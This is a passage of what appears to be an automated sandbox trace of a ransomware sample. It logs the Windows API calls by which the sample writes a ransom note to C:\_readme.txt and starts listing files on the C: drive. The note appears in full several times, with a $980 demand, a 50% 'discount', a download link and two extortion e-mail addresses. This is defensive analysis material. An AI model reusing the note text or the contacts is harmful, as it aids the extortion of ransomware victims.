Size=0x820) returned 0x3a8ca68 [0173.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.561] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.561] PathFindFileNameW (pszPath="") returned="" [0173.561] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.562] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3aa2818 [0173.562] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a8ca68 [0173.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59e70 [0173.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.562] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59e70 | out: hHeap=0x2c0000) returned 1 [0173.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x806) returned 0x3aa2818 [0173.562] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0173.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a8ca68 [0173.563] PathFileExistsW (pszPath="C:\\_readme.txt") returned 0 [0173.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3ad0490 [0173.563] lstrcpyW (in: lpString1=0x3ad0490, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0173.563] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0173.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a8d2f0 [0173.563] CreateFileW (lpFileName="C:\\_readme.txt" (normalized: "c:\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0173.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3ad8198 [0173.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x858) returned 0x326560 [0173.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x326560, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0173.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x326dc0 [0173.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad8198 | out: hHeap=0x2c0000) returned 1 [0173.564] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0173.564] WriteFile (in: hFile=0x690, lpBuffer=0x326dc0*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0xa13fb64, lpOverlapped=0x0 | out: lpBuffer=0x326dc0*, lpNumberOfBytesWritten=0xa13fb64*=0x458, lpOverlapped=0x0) returned 1 [0173.565] CloseHandle (hObject=0x690) returned 1 [0173.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326dc0 | out: hHeap=0x2c0000) returned 1 [0173.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0173.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.566] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x3577340 [0173.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c18 [0173.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534c68 [0173.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c18 | out: hHeap=0x2c0000) returned 1 [0173.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x3a59c18 [0173.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534d48 [0173.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534c68 | out: hHeap=0x2c0000) returned 1 [0173.566] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0173.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a58a20 [0173.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x38) returned 0x35773c0 [0173.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534c68 [0173.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534d48 | out: hHeap=0x2c0000) returned 1 [0173.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c18 | out: hHeap=0x2c0000) returned 1 [0173.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c18 [0173.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a58a20 | out: hHeap=0x2c0000) returned 1 [0173.566] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0173.566] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0173.567] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0173.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a58a20 [0173.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x54) returned 0x3aa8c20 [0173.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534d48 [0173.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59970 [0173.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534c68 | out: hHeap=0x2c0000) returned 1 [0173.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c18 | out: hHeap=0x2c0000) returned 1 [0173.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35773c0 | out: hHeap=0x2c0000) returned 1 [0173.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c18 [0173.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a58a20 | out: hHeap=0x2c0000) returned 1 [0173.567] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0173.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e0c0 [0173.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e108 [0173.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x353fef8 [0173.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534c68 [0173.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a58a20 [0173.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534d48 | out: hHeap=0x2c0000) returned 1 [0173.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59970 | out: hHeap=0x2c0000) returned 1 [0173.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c18 | out: hHeap=0x2c0000) returned 1 [0173.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa8c20 | out: hHeap=0x2c0000) returned 1 [0173.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e078 [0173.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e108 | out: hHeap=0x2c0000) returned 1 [0173.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e0c0 | out: hHeap=0x2c0000) returned 1 [0173.567] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0173.567] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, 